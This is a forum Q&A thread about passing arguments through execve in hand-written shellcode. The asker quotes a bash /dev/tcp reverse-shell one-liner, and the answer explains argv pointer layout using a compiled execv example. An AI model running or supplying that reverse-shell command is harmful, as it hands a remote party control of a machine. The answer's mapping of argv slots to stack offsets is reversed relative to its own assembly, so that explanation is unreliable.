
I'm having a go at learning assembly and writing shellcode. I have a question about execve and passing arguments to the program it will execute.

I have working code to execute a bash shell but am unsure of the input format of execve to pass additional arguments to it. Can I do stdin stdout redirects too? I wanted to create a reverse tcp connection with this type of command line:

/bin/bash -i >& /dev/tcp/192.168.1.4/1234 0>&1

Should the arguments be separated with NULLs? I got it to execute a shell but it didn't connect back to the listening nc.

I know this is an unusual way of doing this but I just wanted to try something different :-)

Cheers


1 Answer


The best way to know how to do it is to compile an example and stop at the assembly level. Let's take this example:

#include <unistd.h>

int
main ()
{
  char *program = "/bin/ls";
  /* execv requires the argument array to end with a NULL pointer */
  char *args[] = {"/bin/ls", "-l", "./", NULL};

  execv(program, args);

  /* only reached if execv fails */
  return 0;
}

When compiled with gcc -Wall -Wextra -S -o myexec.s myexec.c you can read in myexec.s:

        .file   "myexec.c"
        .section        .rodata
.LC0:
        .string "/bin/ls"
.LC1:
        .string "-l"
.LC2:
        .string "./"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        pushq   %rbp
        movq    %rsp, %rbp
        subq    $32, %rsp
        movq    $.LC0, -8(%rbp)
        movq    $.LC0, -32(%rbp)
        movq    $.LC1, -24(%rbp)
        movq    $.LC2, -16(%rbp)
        leaq    -32(%rbp), %rdx
        movq    -8(%rbp), %rax
        movq    %rdx, %rsi
        movq    %rax, %rdi
        call    execv
        movl    $0, %eax
        leave
        ret

So, the argument list of the command line is composed of a list of strings, and the first argument is the path to the executable file (-8(%rbp)); then each argument is passed through a pointer to its string: argv[0] = -16(%rbp), argv[1] = -24(%rbp), argv[2] = -32(%rbp), ... and so on.

So, you just have to have the addresses of each string and push them (in the proper order) onto the stack before calling execv.


2 Comments

Thanks mate. That has helped clear up things a bit for me. I am not familiar with 64 bit but the concept of each arg being passed as a pointer to its string is what I wasn't sure of (each NULL terminated I guess). I'll have another go and I guess I'll find out if redirection works.
Well, I rewrote it and got it executing as it should, but the redirection doesn't work as expected for some reason. I get -i: >&: no such file or directory.
